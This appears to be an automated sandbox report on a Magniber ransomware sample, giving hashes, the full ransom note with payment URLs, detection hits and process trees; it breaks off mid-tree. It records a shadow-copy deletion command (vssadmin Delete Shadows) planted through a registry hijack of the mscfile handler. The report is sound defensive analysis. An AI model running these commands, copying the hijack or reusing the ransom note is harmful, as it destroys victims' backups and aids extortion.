magniber | b03807ae0497bc9022cfa114035a0269cc6c7b0cddf4e75d6e59e3570d680379

Analysis

max time kernel
51s
max time network
272s
platform
windows7_x64
resource
win7-20230220-es
resource tags

arch:x64arch:x86image:win7-20230220-eslocale:es-esos:windows7-x64systemwindows
submitted
20-04-2023 19:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
Size

21KB
MD5

24d60185a9e294a60c03b90fe731a04a
SHA1

c46b6a52efe81e02da8084f197efce7cb482f897
SHA256

0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6
SHA512

4419eaf48a932c9139c891ee36f51c8a7087357b2de56378a2c3399d8635f90460b30e16dc2b11db704a5f2e702fd116f292f723856b0fca008861eef8302674
SSDEEP

384:OJbAmDnd7/PLP8n/rMwpoRIcGLnTYF4WlIF1jFlQgLDcx9cXBHby0hPnHOnk1:OJbAm7bEnToR2/UlIvQg29Wxy0hPnHK

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://4e1c3470029058e0e8yzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://4e1c3470029058e0e8yzboiuv.lieedge.casa/yzboiuv http://4e1c3470029058e0e8yzboiuv.wonride.site/yzboiuv http://4e1c3470029058e0e8yzboiuv.lognear.xyz/yzboiuv http://4e1c3470029058e0e8yzboiuv.bejoin.space/yzboiuv Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://4e1c3470029058e0e8yzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv

http://4e1c3470029058e0e8yzboiuv.lieedge.casa/yzboiuv

http://4e1c3470029058e0e8yzboiuv.wonride.site/yzboiuv

http://4e1c3470029058e0e8yzboiuv.lognear.xyz/yzboiuv

http://4e1c3470029058e0e8yzboiuv.bejoin.space/yzboiuv

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/1052-325-0x0000000000020000-0x0000000000025000-memory.dmp	family_magniber
behavioral1/memory/1120-337-0x0000000001BC0000-0x0000000001BC4000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 8 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	940	1160	cmd.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	596	1160	cmd.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	1160	cmd.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1352	1160	cmd.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	1160	vssadmin.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1368	1160	vssadmin.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	1160	vssadmin.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1256	1160	vssadmin.exe	44

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\OutExpand.raw => C:\Users\Admin\Pictures\OutExpand.raw.yzboiuv	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SelectConvert.crw => C:\Users\Admin\Pictures\SelectConvert.crw.yzboiuv	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\DismountSave.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\DismountSave.tiff => C:\Users\Admin\Pictures\DismountSave.tiff.yzboiuv	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\StepGrant.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\StepGrant.tiff => C:\Users\Admin\Pictures\StepGrant.tiff.yzboiuv	taskhost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1052 set thread context of 1120	1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe	18
PID 1052 set thread context of 1172	1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe	10
PID 1052 set thread context of 1204	1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe	17

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 2 TTPs 4 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1108	vssadmin.exe
1368	vssadmin.exe
1988	vssadmin.exe
1256	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007837404bb2ac374381d657b4bfd4f9e200000000020000000000106600000001000020000000f963e40eb169c5bd3af0cffbad20d17777dc098d3bbe2a89145b25acdb645339000000000e8000000002000020000000afb4e8560280157a2cfc90061b525bcaa0f35f530b8b6efa1f7a6ba7e51dbed020000000eeac9da5d2affe1a6907e3d6ec605b47f763f1d8ea8a2077da4d4736fa4f5c8040000000be9e808fbdc3a3cd9e9916f0b83029c970d4927fa6e8eb0dfb031f44d4244535013ced64c5f52e53c901ba9bbe08cd7150507e8026b04a3d0abba8173d0411f7	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FA92CBC1-DFC1-11ED-84E7-7A574369CBCF} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b06aebd6ce73d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007837404bb2ac374381d657b4bfd4f9e2000000000200000000001066000000010000200000003697be842872616ba40ad6eb32272fb994a21efe132016dd559080c19a88fa67000000000e800000000200002000000010156eb895d7e93f64d8c74920731b782b4b790068739a7cbb363c53a03af68890000000dcdd293ec727a645e5225bfc6f5caeaa8306b29dae8cf567f5bcec3c47f06a7aee8c69d37d6a8b6e7dff45df5aa61a7a4e02944528c086d41780d6e940d57811183b3a2eaaa93445e136d736c64a569b52ed4d32616e02b09c67b0e22f7c9917a5c41b240c2c972eff3b3a21abee3c3d5be79e4dba7a76700fa59081a0668e6893b450feb5a4cceff8a969de3ce70a68400000003ad4e55b3a00c50bf301a35f843707eb2f68a19579a3de876e4024d3c192f4becd51ac3b38f21fe4d5dcdb038ac91aa425626fcb64567449eabccbdf177f2f8d	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1288	notepad.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
2008	chrome.exe
2008	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1204	Explorer.EXE

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	748	WMIC.exe
Token: SeSecurityPrivilege	748	WMIC.exe
Token: SeTakeOwnershipPrivilege	748	WMIC.exe
Token: SeLoadDriverPrivilege	748	WMIC.exe
Token: SeSystemProfilePrivilege	748	WMIC.exe
Token: SeSystemtimePrivilege	748	WMIC.exe
Token: SeProfSingleProcessPrivilege	748	WMIC.exe
Token: SeIncBasePriorityPrivilege	748	WMIC.exe
Token: SeCreatePagefilePrivilege	748	WMIC.exe
Token: SeBackupPrivilege	748	WMIC.exe
Token: SeRestorePrivilege	748	WMIC.exe
Token: SeShutdownPrivilege	748	WMIC.exe
Token: SeDebugPrivilege	748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	748	WMIC.exe
Token: SeRemoteShutdownPrivilege	748	WMIC.exe
Token: SeUndockPrivilege	748	WMIC.exe
Token: SeManageVolumePrivilege	748	WMIC.exe
Token: 33	748	WMIC.exe
Token: 34	748	WMIC.exe
Token: 35	748	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1376	WMIC.exe
Token: SeSecurityPrivilege	1376	WMIC.exe
Token: SeTakeOwnershipPrivilege	1376	WMIC.exe
Token: SeLoadDriverPrivilege	1376	WMIC.exe
Token: SeSystemProfilePrivilege	1376	WMIC.exe
Token: SeSystemtimePrivilege	1376	WMIC.exe
Token: SeProfSingleProcessPrivilege	1376	WMIC.exe
Token: SeIncBasePriorityPrivilege	1376	WMIC.exe
Token: SeCreatePagefilePrivilege	1376	WMIC.exe
Token: SeBackupPrivilege	1376	WMIC.exe
Token: SeRestorePrivilege	1376	WMIC.exe
Token: SeShutdownPrivilege	1376	WMIC.exe
Token: SeDebugPrivilege	1376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1376	WMIC.exe
Token: SeRemoteShutdownPrivilege	1376	WMIC.exe
Token: SeUndockPrivilege	1376	WMIC.exe
Token: SeManageVolumePrivilege	1376	WMIC.exe
Token: 33	1376	WMIC.exe
Token: 34	1376	WMIC.exe
Token: 35	1376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	624	wmic.exe
Token: SeSecurityPrivilege	624	wmic.exe
Token: SeTakeOwnershipPrivilege	624	wmic.exe
Token: SeLoadDriverPrivilege	624	wmic.exe
Token: SeSystemProfilePrivilege	624	wmic.exe
Token: SeSystemtimePrivilege	624	wmic.exe
Token: SeProfSingleProcessPrivilege	624	wmic.exe
Token: SeIncBasePriorityPrivilege	624	wmic.exe
Token: SeCreatePagefilePrivilege	624	wmic.exe
Token: SeBackupPrivilege	624	wmic.exe
Token: SeRestorePrivilege	624	wmic.exe
Token: SeShutdownPrivilege	624	wmic.exe
Token: SeDebugPrivilege	624	wmic.exe
Token: SeSystemEnvironmentPrivilege	624	wmic.exe
Token: SeRemoteShutdownPrivilege	624	wmic.exe
Token: SeUndockPrivilege	624	wmic.exe
Token: SeManageVolumePrivilege	624	wmic.exe
Token: 33	624	wmic.exe
Token: 34	624	wmic.exe
Token: 35	624	wmic.exe
Token: SeIncreaseQuotaPrivilege	1872	WMIC.exe
Token: SeSecurityPrivilege	1872	WMIC.exe
Token: SeTakeOwnershipPrivilege	1872	WMIC.exe
Token: SeLoadDriverPrivilege	1872	WMIC.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
808	iexplore.exe
1204	Explorer.EXE
1204	Explorer.EXE
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
2008	chrome.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
808	iexplore.exe
808	iexplore.exe
1460	IEXPLORE.EXE
1460	IEXPLORE.EXE
1460	IEXPLORE.EXE
1460	IEXPLORE.EXE
1204	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1120 wrote to memory of 1288	1120	taskhost.exe	28
PID 1120 wrote to memory of 1288	1120	taskhost.exe	28
PID 1120 wrote to memory of 1288	1120	taskhost.exe	28
PID 1120 wrote to memory of 908	1120	taskhost.exe	30
PID 1120 wrote to memory of 908	1120	taskhost.exe	30
PID 1120 wrote to memory of 908	1120	taskhost.exe	30
PID 1120 wrote to memory of 1272	1120	taskhost.exe	29
PID 1120 wrote to memory of 1272	1120	taskhost.exe	29
PID 1120 wrote to memory of 1272	1120	taskhost.exe	29
PID 1172 wrote to memory of 1588	1172	Dwm.exe	34
PID 1172 wrote to memory of 1588	1172	Dwm.exe	34
PID 1172 wrote to memory of 1588	1172	Dwm.exe	34
PID 1204 wrote to memory of 284	1204	Explorer.EXE	37
PID 1204 wrote to memory of 284	1204	Explorer.EXE	37
PID 1204 wrote to memory of 284	1204	Explorer.EXE	37
PID 1052 wrote to memory of 468	1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe	36
PID 1052 wrote to memory of 468	1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe	36
PID 1052 wrote to memory of 468	1052	0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe	36
PID 1272 wrote to memory of 748	1272	cmd.exe	39
PID 1272 wrote to memory of 748	1272	cmd.exe	39
PID 1272 wrote to memory of 748	1272	cmd.exe	39
PID 1588 wrote to memory of 1376	1588	cmd.exe	41
PID 1588 wrote to memory of 1376	1588	cmd.exe	41
PID 1588 wrote to memory of 1376	1588	cmd.exe	41
PID 468 wrote to memory of 1872	468	cmd.exe	42
PID 468 wrote to memory of 1872	468	cmd.exe	42
PID 468 wrote to memory of 1872	468	cmd.exe	42
PID 284 wrote to memory of 624	284	cmd.exe	62
PID 284 wrote to memory of 624	284	cmd.exe	62
PID 284 wrote to memory of 624	284	cmd.exe	62
PID 908 wrote to memory of 808	908	cmd.exe	45
PID 908 wrote to memory of 808	908	cmd.exe	45
PID 908 wrote to memory of 808	908	cmd.exe	45
PID 940 wrote to memory of 1244	940	cmd.exe	54
PID 940 wrote to memory of 1244	940	cmd.exe	54
PID 940 wrote to memory of 1244	940	cmd.exe	54
PID 1352 wrote to memory of 268	1352	Process not Found	55
PID 1352 wrote to memory of 268	1352	Process not Found	55
PID 1352 wrote to memory of 268	1352	Process not Found	55
PID 1284 wrote to memory of 476	1284	cmd.exe	57
PID 1284 wrote to memory of 476	1284	cmd.exe	57
PID 1284 wrote to memory of 476	1284	cmd.exe	57
PID 596 wrote to memory of 524	596	Process not Found	56
PID 596 wrote to memory of 524	596	Process not Found	56
PID 596 wrote to memory of 524	596	Process not Found	56
PID 1244 wrote to memory of 1240	1244	CompMgmtLauncher.exe	59
PID 1244 wrote to memory of 1240	1244	CompMgmtLauncher.exe	59
PID 1244 wrote to memory of 1240	1244	CompMgmtLauncher.exe	59
PID 268 wrote to memory of 1300	268	CompMgmtLauncher.exe	77
PID 268 wrote to memory of 1300	268	CompMgmtLauncher.exe	77
PID 268 wrote to memory of 1300	268	CompMgmtLauncher.exe	77
PID 524 wrote to memory of 624	524	CompMgmtLauncher.exe	62
PID 524 wrote to memory of 624	524	CompMgmtLauncher.exe	62
PID 524 wrote to memory of 624	524	CompMgmtLauncher.exe	62
PID 476 wrote to memory of 900	476	CompMgmtLauncher.exe	64
PID 476 wrote to memory of 900	476	CompMgmtLauncher.exe	64
PID 476 wrote to memory of 900	476	CompMgmtLauncher.exe	64
PID 808 wrote to memory of 1460	808	iexplore.exe	67
PID 808 wrote to memory of 1460	808	iexplore.exe	67
PID 808 wrote to memory of 1460	808	iexplore.exe	67
PID 808 wrote to memory of 1460	808	iexplore.exe	67
PID 1204 wrote to memory of 2008	1204	Explorer.EXE	79
PID 1204 wrote to memory of 2008	1204	Explorer.EXE	79
PID 1204 wrote to memory of 2008	1204	Explorer.EXE	79

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1376

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Users\Admin\AppData\Local\Temp\0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
  "C:\Users\Admin\AppData\Local\Temp\0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1052
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1872
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:284
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2008
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6cc9758,0x7fef6cc9768,0x7fef6cc9778
    3⤵
    PID:1784
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:2
    3⤵
    PID:692
- - C:\Program Files\Google\Chrome\Application\chrome.exe
